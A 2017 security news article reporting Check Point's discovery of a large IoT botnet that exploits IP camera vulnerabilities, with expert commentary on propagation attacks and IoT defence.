New Botnet Continues to Grow

Monday, October 23, 2017 @ 11:10 AM gHale

A new botnet is on the hunt for weakly secured Internet of Things (IoT) devices, researchers said.

To date, one million organizations appear to have been hit by the botnet, which first became visible in late September, said researchers at Check Point.

Google Play Hit by Botnet Malware
Hidden in Plain Sight: Backdoor Uses FTP Server
Cisco Fixes Backdoor
Iran Focuses on Aerospace, Energy: Report

At first the malware goes after vulnerabilities commonly found in various IP camera models. Targeted vendors include GoAhead, D-Link, TP-Link, AVTECH, NETGEAR, MikroTik, Linksys, and Synology.

“So far we estimate over a million organizations have already been affected worldwide, including the U.S., Australia and everywhere in between, and the number is only increasing,” Check Point researchers said in a post.

“The discovery of a botnet bigger and potentially more dangerous than Mirai is alarming news for businesses and consumers around the globe,” said Mark Hearn, director of IoT Security at Irdeto. “This discovery again shows the security weaknesses in IoT devices than can be harnessed by attackers for potentially devastating effects.

“Creating networks of infected devices is not a quick task for an attacker,” Check Point researchers said. “In order to establish an effective Botnet, the attacker needs to be able to control a vast number of devices. As sending the malicious code to each device individually would be a large and time consuming task, it is much easier to have each infected device spreading the malicious code to other similar devices themselves. This method of attack is considered a propagation attack, and is essential in quickly creating a large network of controlled devices.”

An infected device shows, Check Point researchers said, attackers get into the System.ini file to check for compromise. Normally, that file would contain the credentials of the user, but on the hacked device it contained a ‘Netcat’ command to open a reverse shell to the attacker’s IP instead.

Thus, the researchers concluded the machine, a GoAhead device compromised using the CVE-2017-8225 vulnerability, was transmitting the infection after being infected itself.

“Upon further research, it was found that numerous devices were both being targeted and later sending out the infection. These attacks were coming from many different types of devices and many different countries, totaling approximately 60 percent of the corporate networks which are part of the ThreatCloud global network,” Check Point researchers said.

The security researchers the people behind this threat might be getting ready for massive, global attacks, possibly distributed denial of service (DDoS).

“The increased connectivity of IoT devices and ecosystems, brings a much greater security risk that is being exposed time and time again,” Hearn said. “However, while organizations recognize the importance of this connectivity to meet consumer demand and maintain a competitive edge, today’s connected world also assists in how botnets like this spread. With the cross-contamination of connected devices, threats easily cross boundaries of the connected home, the connected building, mobile devices and the enterprise. Gone are the days where protecting devices inside corporate walls is enough. As a result, security strategists need to think differently, factoring in the full IoT threat landscape and thinking like a hacker.”

To combat these threats, Hearn added, organizations should implement a multi-layered cybersecurity strategy that disrupts a hacker’s business model, making it difficult to reverse engineer or tamper with software and exploit vulnerabilities introduced through connected devices.

Leave a Reply

You must be logged in to post a comment.